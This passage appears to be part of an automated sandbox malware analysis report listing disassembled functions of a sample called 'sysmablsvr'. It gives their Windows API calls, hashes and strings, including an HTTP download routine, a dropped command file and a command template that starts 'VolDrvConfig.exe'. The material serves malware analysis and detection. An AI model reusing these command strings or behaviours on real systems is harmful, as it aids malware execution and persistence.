                                              • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                              • WSACloseEvent.WS2_32(?), ref: 00401715
                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                              • String ID: PCOI$ilci
                                              • API String ID: 2403999931-3762367603
                                              • Opcode ID: 7df5625406d7924a9ef55977e1bd28806cadd22570a056913c37e6fa8f7b7583
                                              • Instruction ID: 5b8540bf1bb466d15bf787bf2847de779fcfe5b3cc035b7f1a74ac98c73710f1
                                              • Opcode Fuzzy Hash: 7df5625406d7924a9ef55977e1bd28806cadd22570a056913c37e6fa8f7b7583
                                              • Instruction Fuzzy Hash: D731A875900705ABC710EF70EC48B97B7B8BF08710F048A2AF559A3691C779F894CB98
                                              Function 0040E150 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.NTDLL ref: 0040E178
                                              • InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040E30A
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E347
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E354
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                              • String ID: <$GET
                                              • API String ID: 1205665004-427699995
                                              • Opcode ID: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction ID: 0e0ad4ad31c216dc2eff2ccec99c89ab6a28dd79d12b38366d41975b782ec3ac
                                              • Opcode Fuzzy Hash: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction Fuzzy Hash: 6E511BB5901228ABDB36CB50CC55BE9B7BCAB44705F0444E9A60DAA2C0D7B96BC4CF54
                                              Function 00406000 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,00000000,0040BE82,006A0266,?,0040BE9E,00000000,0040D17C,?), ref: 0040600F
                                              • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                              • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                              • LeaveCriticalSection.KERNEL32(004174D8,?,?,?,?,?,?,0040BE9E,00000000,0040D17C,?), ref: 00406248
                                              Strings
                                              • C:\Users\user\tbtcmds.dat, xrefs: 004061C0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                              • String ID: C:\Users\user\tbtcmds.dat
                                              • API String ID: 1457358591-1042172597
                                              • Opcode ID: fc3fbd14c8c4e913f040ec335e7850d4c7a20847d82a3d6e72c5a2ff44c735bb
                                              • Instruction ID: d2a8f2c597d4f808d2c136561af7b6c80c21d69a530c7dbbc8373d1e9f004416
                                              • Opcode Fuzzy Hash: fc3fbd14c8c4e913f040ec335e7850d4c7a20847d82a3d6e72c5a2ff44c735bb
                                              • Instruction Fuzzy Hash: 6071E0B4E042099BCB04CF98D981FEFBBB1BB48304F14816DE505BB382D779A951CBA5
                                              Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                              • setsockopt.WS2_32 ref: 00401F2C
                                              • closesocket.WS2_32(?), ref: 00401F39
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                              • String ID:
                                              • API String ID: 671207744-0
                                              • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction ID: 8c1e587a25cfc232de2ab0883eb36e20e47ed0b1207a5ae34e006e610dd4584e
                                              • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction Fuzzy Hash: F2519F75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                              Function 0040E670 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction ID: 498a00270a4ac3f3e732f182914c0c13a71c1caacf2de73c52121c1bdff13e9d
                                              • Opcode Fuzzy Hash: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction Fuzzy Hash: D5412E74A0020AEFDB04DF95C884FAFB7B9BF48304F108969E515A7390D778AE85CB95
                                              Function 0040E7D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction ID: f37cc5fa491f806f20af1ba12fe7b13e6bb3fdd54c67fa744f8c06207b50935d
                                              • Opcode Fuzzy Hash: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction Fuzzy Hash: D1412DB5A0020ADFCB14DF99C884BAFB7B9BF48304F108569E515B7390D778AE85CB94
                                              Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: 5fdc0146492539df05ccd50cd035e90a966d871b42942f97a700882ce693defd
                                              • Instruction ID: 6ff3262b9ae864165baf17eb68ae52fc582ecffe48c2a7281556c95dbf3b24cf
                                              • Opcode Fuzzy Hash: 5fdc0146492539df05ccd50cd035e90a966d871b42942f97a700882ce693defd
                                              • Instruction Fuzzy Hash: 8C31E172200215ABC710AFB5ED8CAD7B7A8FF54324F00463EF55AD3280DB79A8448B99
                                              Function 00406400 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040640B
                                              • CoCreateInstance.OLE32(00412A48,00000000,00000001,00412A28,?), ref: 00406423
                                              • wsprintfW.USER32 ref: 00406456
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInitializeInstancewsprintf
                                              • String ID: %comspec%$/c start %s & start %s\VolDrvConfig.exe$Gh@
                                              • API String ID: 2038452267-1238916929
                                              • Opcode ID: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction ID: 7d2455aabe9eb384640674d95cb3f7402ea72c7f03b095a020dcafb7bbec31f6
                                              • Opcode Fuzzy Hash: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction Fuzzy Hash: 8E31C975A40208EFCB04DF98D885EDEB7B5EF88704F108199F519A73A5CA74AE81CB54
                                              Function 0040E811 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction ID: 0db10e415d6a1e8faee94fa1aa357f29b7cea0d9451b7bd8199af60d13ceb70c
                                              • Opcode Fuzzy Hash: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction Fuzzy Hash: 98312AB5E0020ADFCB14DF99D884BAFB7B5BF88304F108569E514B7390D778AA81CB94
                                              Function 0040E6B1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction ID: f860d819dcfac7245c0065b1f48ab1f28a181454cf029f87bdd60df825f867a0
                                              • Opcode Fuzzy Hash: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction Fuzzy Hash: B9311D74A0020A9FCB04CF99D884FEFB7B5BF88304F148969E514B7390D778AA85CB95
                                              Function 00409440 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl_aullshr
                                              • String ID:
                                              • API String ID: 673498613-0
                                              • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction ID: c7f26e6fe3f6e47823c68d9e93f939c843ab0f3ebbce24f5146439a699fa7f9b
                                              • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction Fuzzy Hash: CC114F326005186B8B10EF9EC44269ABBD6EF84360B15C136FC2CCF319D634D9414BD4
                                              Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                              • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                              • String ID:
                                              • API String ID: 3966618661-0
                                              • Opcode ID: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction ID: 36d18bb318df5a029dedd03b2acd005dba350197efc47ce95ae0e9b03ff24c88
                                              • Opcode Fuzzy Hash: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction Fuzzy Hash: 7241A175604A01ABC714EB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99
                                              Function 00409020 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl
                                              • String ID:
                                              • API String ID: 435966717-0
                                              • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                              • Instruction ID: 6393123168de4f4826dca7712cb04f948d5e4027293efa58ed578d500b7b4a08
                                              • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                              • Instruction Fuzzy Hash: DDF03172901428AB9750EEFF84424CBF7E6AF9C368B219176FC18E3260E9709D0546F2
                                              Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                              • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                              • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                                • Part of subcall function 0040A740: HeapFree.KERNEL32(00520000,00000000,00402612,?,00402612,?), ref: 0040A79B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                              • String ID: pdu
                                              • API String ID: 309973729-2320407122
                                              • Opcode ID: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction ID: d282b52b3110f6f030980250f42d45aa65f4851f6724e2164e4de9b2c85264d0
                                              • Opcode Fuzzy Hash: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction Fuzzy Hash: 6101D6765003009BCB20AF51ECC0E9B7779AF48311704467AFD04AB396C738E84187B9
                                              Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                              • WSAGetLastError.WS2_32 ref: 00401FB9
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                              • String ID:
                                              • API String ID: 2074799992-0
                                              • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                              • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                              Function 00407300 Relevance: 6.1, APIs: 4, Instructions: 60sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                              • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                              • Sleep.KERNEL32(000003E8), ref: 00407361
                                              • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CacheDeleteEntry$Sleep
                                              • String ID:
                                              • API String ID: 672405725-0
                                              • Opcode ID: e37e67c5e651afdd73fe97e6f1adc621bd3a80b28928a04f69d35c1e57e85d56
                                              • Instruction ID: 2037616d4c8183bc1dcd880db7f677971b3714fceeeaba453b7e7dde7ca31e21
                                              • Opcode Fuzzy Hash: e37e67c5e651afdd73fe97e6f1adc621bd3a80b28928a04f69d35c1e57e85d56
                                              • Instruction Fuzzy Hash: CC217F75E04208FBDB04DFA4D885B9EBB74AF45305F10C1B9ED016B391D679AA80DB49
                                              Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                              • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                              • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                              Memory Dump Source
